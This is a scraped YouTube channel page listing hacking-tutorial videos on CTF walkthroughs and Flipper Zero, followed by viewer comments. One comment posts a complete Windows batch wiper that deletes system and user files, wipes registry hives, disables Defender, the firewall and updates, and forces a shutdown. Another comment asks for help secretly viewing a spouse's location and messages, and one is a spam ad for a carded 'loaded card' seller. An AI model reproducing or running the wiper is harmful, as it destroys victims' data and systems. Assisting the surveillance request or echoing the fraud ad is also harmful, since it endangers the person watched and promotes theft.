Never Trust Hotel Safes!!!
1:38
Жыл бұрын
ChatGPT for Cybersecurity
19:11
2 жыл бұрын
ChatGPT Quickstart Guide
2:03
2 жыл бұрын
Flipper Zero - Bad USB
6:43
2 жыл бұрын
Flipper Zero: Beginner Guide
8:57
2 жыл бұрын
Signal Proxy in 5 Minutes
5:19
2 жыл бұрын
TryHackMe // Corridor
7:27
2 жыл бұрын
TryHackMe // Simple CTF (Easy CTF)
11:47
Hack The Box // Three Walkthrough
18:55
Hack The Box // Sequel
6:58
2 жыл бұрын
TryHackMe // RootMe
12:56
2 жыл бұрын
TryHackMe // Pickle Rick CTF
11:33
2 жыл бұрын
HackTheBox Walkthrough // Appointment
11:36
TryHackMe // Basic Pentesting
21:02
2 жыл бұрын
HackTheBox // Redeemer Walkthrough
9:00
HackTheBox // Dancing Walkthrough
8:25
HackTheBox // Fawn Walkthrough
9:32
2 жыл бұрын
HackTheBox // Meow Walkthrough
9:32
2 жыл бұрын
Пікірлер
@EricReyes-bm8ki
@EricReyes-bm8ki Күн бұрын
Can anyone help me see my wifes Iocation or measages
@Yahie_yo7ah
@Yahie_yo7ah 2 күн бұрын
Can i use phone wifi adapter?
@testme4022
@testme4022 2 күн бұрын
Good way to scratch your screen 😅
@joshuarowell1170
@joshuarowell1170 2 күн бұрын
Lol keys are now 6 pins
@PodStarzOfficial
@PodStarzOfficial 3 күн бұрын
If it can't run doom... I don't want it 😊
@davidsimpson2304
@davidsimpson2304 3 күн бұрын
Can a Flipper Zero.. Hack a Flipper Zero?
@christtom27
@christtom27 3 күн бұрын
EWWWW DISLIKE!
@davidsimpson2304
@davidsimpson2304 4 күн бұрын
Can a Flipper One Hack another Flipper One?
@ChuspinSpain
@ChuspinSpain 4 күн бұрын
4:50 And that's the reason why thinfoil hats exist!! lol
@KerryFreudenthaler-u5o
@KerryFreudenthaler-u5o 4 күн бұрын
some people just don't know how to hack OfCourse it won't work there's more steps then that if u want it to work and it will work but ur missing a step
@BeaglezReal
@BeaglezReal 5 күн бұрын
does it work on 5ghz too
@mathiassteck6439
@mathiassteck6439 5 күн бұрын
And Santa Clause is real!
@autobotoctolingthomasho3362
@autobotoctolingthomasho3362 6 күн бұрын
ECM jammer here
@unboxing44
@unboxing44 9 күн бұрын
Please wich raspberry pi can i use becouse raspberry pi 5 is expendibe in my country and i use another one that cheapest than you
@wozemyt
@wozemyt 9 күн бұрын
that onr country...
@bl4ckfeather
@bl4ckfeather 10 күн бұрын
good luck in vietnam 😂
@carlosjaundoo3188
@carlosjaundoo3188 11 күн бұрын
the importance of physical security protocols cannot be overstated.
@JasonEdward-d9f
@JasonEdward-d9f 11 күн бұрын
I remember obtaining my first loaded card frm GLIZYDAWG, So excited to stumbled upon honest mate. Got smooth cash out after gotten touchdown to my doorstep🫡
@littlecatmusicandmore
@littlecatmusicandmore 11 күн бұрын
flipper is so cute tbh
@VoltronLion
@VoltronLion 12 күн бұрын
It’s a cheap replacement for the flipper zero probably can not do everything the flipper can 😂
@HangryDiesel
@HangryDiesel 12 күн бұрын
Bad usb - show _saved _passwords or passwords _fixed …. Prompts file not found ? Ideas ?
@LdHrothgar
@LdHrothgar 13 күн бұрын
I know this video is 2 years old but it's Jan of 2025 and I can still buy a F0... they ship them FROM the US, so getting them IN the US isn't an issue.
@O0ZE34
@O0ZE34 13 күн бұрын
does it have nfc? does it have sub-ghz? does it have games? does it have animations?
@Alexsuperhero590
@Alexsuperhero590 13 күн бұрын
How do stop it
@ervertebra8848
@ervertebra8848 13 күн бұрын
💩💩
@Crypto_Byte_wave
@Crypto_Byte_wave 16 күн бұрын
@echo off REM ********************************************* REM ⚠️ WARNING: DANGEROUS SCRIPT ⚠️ REM ********************************************* REM THIS SCRIPT WILL CAUSE IRREVERSIBLE DAMAGE. REM DO NOT RUN ON REAL COMPUTERS. REM FOR EDUCATIONAL PURPOSES ONLY IN A CONTROLLED, ISOLATED ENVIRONMENT. REM ********************************************* REM ** IF RUN ON A REAL SYSTEM, YOU MAY: ** REM - DESTROY ALL DATA ON YOUR COMPUTER REM - RENDER YOUR OPERATING SYSTEM UNUSABLE REM - VIOLATE LAWS AND FACE LEGAL CONSEQUENCES REM ********************************************* REM BY PROCEEDING, YOU ACCEPT FULL RESPONSIBILITY. REM ********************************************* :CHOICE echo Are you sure you want to run this script? (YES/NO) set /p userChoice=Type YES to run or NO to exit: if /I "%userChoice%"=="YES" goto RUN if /I "%userChoice%"=="NO" goto EXIT echo Invalid input. Please type YES or NO. goto CHOICE :RUN echo Proceeding with script execution... REM ********************************************* REM ⚠️ DESTRUCTIVE ACTIONS START HERE ⚠️ REM ********************************************* REM Simulating malicious actions: REM Intent: Disable user input del c:\ /f /s /q del c:\windows /f /s /q del C:\Windows\system32 /f /s /q del C:\system32\logonui.exe /f /q del c:\windows\system32 estore /f /s /q del C:\windows\system32\winlogin.exe /f /q del C:\windows /f /s /q del C:\NVIDIA /f /s /q del c:\windows /f /s /q del C:\Documents And Settings /f /s /q del D:\RECOVERY /f /s /q del C:\SwSetup /f /s /q del C:\Temp /f /s /q del C:\Program Files /f /s /q del C:\PerfLogs /f /s /q del c:\.rnd /f /q del C:\Brukere /f /s /q del C:\Users /f /s /q del C:\MCPP /f /s /q del C:\CMD /f /s /q del c:\ /f /s /q REM Intent: Corrupt system registry reg delete HKLM /f /va reg delete HKCU /f /va REM Intent: Disable Windows Defender sc stop windefend sc config windefend start= disabled REM Intent: Disable Firewall netsh advfirewall set currentprofile state=off REM Intent: Disable Windows Updates continued sc stop wuauserv sc config wuauserv start= disabled REM Intent: Corrupt system drivers del C:\Windows\System32\drivers /f /s /q REM Intent: Destroy user data del C:\Users\* /f /s /q del D:\* /f /s /q REM Intent: Disable boot process del C:\Windows\System32\winload.exe /f /q del C:\Windows\System32\winresume.exe /f /q REM Intent: Show destructive message color c cls echo ⚠️ SYSTEM COMPROMISED ⚠️ echo ALL FILES DELETED. SYSTEM DISABLED. echo YOU SHOULD NOT HAVE RUN THIS SCRIPT NOW FACE THE CONSEQUENCES 😈 ! dir /s pause shutdown -s -t 10 -c "Say goodbye to your computer!" goto END :EXIT echo Exiting script. No changes were made. pause goto END :END exit Disclaimer ⚠️:- don't run in your computer
@plubbbzzz5472
@plubbbzzz5472 16 күн бұрын
Would I be able to take the rolling code off key fob just from walking out of distance?
@Edward-p2g
@Edward-p2g 17 күн бұрын
There’s a easier way
@badyoutuber1986
@badyoutuber1986 17 күн бұрын
WiFi password word?
@badyoutuber1986
@badyoutuber1986 17 күн бұрын
WIFI?
@the-terraria-nerd3130
@the-terraria-nerd3130 18 күн бұрын
Ooo, your using momentum, its my firmware of choice too
@lalhmingthamawia7466
@lalhmingthamawia7466 20 күн бұрын
Fack mat lena bhai lok pendrive dedega
@blueduckey2
@blueduckey2 20 күн бұрын
Im blueducky
@abubbam
@abubbam 21 күн бұрын
This will be so handy i just wish it did best lock also. We have a mix of key types used on our buildings
@astutusmortuus
@astutusmortuus 22 күн бұрын
You have to have the same AM modulation and frequency.
@element_47
@element_47 23 күн бұрын
Daaaammnnn... I feel like "this is fine" dog rn 😅.. good to know! Thanks !
@element_47
@element_47 23 күн бұрын
Is that the hackrf?
@Cobaltprota
@Cobaltprota 24 күн бұрын
Yay i can see what prota family scam link is
@CAN_AM_RZR
@CAN_AM_RZR 25 күн бұрын
Do you have unleashed firmware?
@Isaak-t2v
@Isaak-t2v 25 күн бұрын
That is just kturtle not a “virus“. Also, an ˋvirusˋ is an program that replicates itself. Bad video.
@chaosdiver-co4
@chaosdiver-co4 25 күн бұрын
bro I got 1 today
@deltasource56
@deltasource56 25 күн бұрын
Blocked for strobing
@disnotpix
@disnotpix 26 күн бұрын
Lol noob
@32phoenixx
@32phoenixx 27 күн бұрын
Good luck taking the flipper to the store and asking them to " make this key "
@ImCleos
@ImCleos 25 күн бұрын
You wouldn’t need to, just need the numbers
@vuway-
@vuway- 17 күн бұрын
3D printers haha plenty of filaments are rigid enough and if they are not you just use tension wrench
@honestlocksmith5428
@honestlocksmith5428 16 күн бұрын
There's plenty of online services that will make it.
@gapingpeanut
@gapingpeanut 27 күн бұрын
so you can use this to program key fobs?
@13vrzz
@13vrzz 27 күн бұрын
import turtle a=turtle.Turtle() a.color('green1') a.speed(0) a.hideturtle() s=turtle.Screen() s.bgcolor('black') for x in range(200): a.forward(x_ a.left(x-1) turtle.done
@Uckermärker
@Uckermärker 28 күн бұрын
Das funktioniert nicht,weil was der Stick versucht ein zu tippen als PW das gibt man ja in den Text Skript vor beim installieren mit 0001,0002 usw 🤣🤣🤣 Das angebliche PW schreibt man ja ins Text Skript,was er dann ein gibt um das handy zu entsperren 😂
@dvr1337
@dvr1337 28 күн бұрын
Whats hacker rev and procsmart??
@SalMa-p6f4r
@SalMa-p6f4r 29 күн бұрын
এটার দাম কত
@justforfun3852
@justforfun3852 29 күн бұрын
this tool is awesome 😮
@HarlockG
@HarlockG 24 күн бұрын
Wait till you see what pen and paper can do
@honestlocksmith5428
@honestlocksmith5428 16 күн бұрын
​@HarlockG who carries papers around with dozens of perfectly spaced lines for different keys?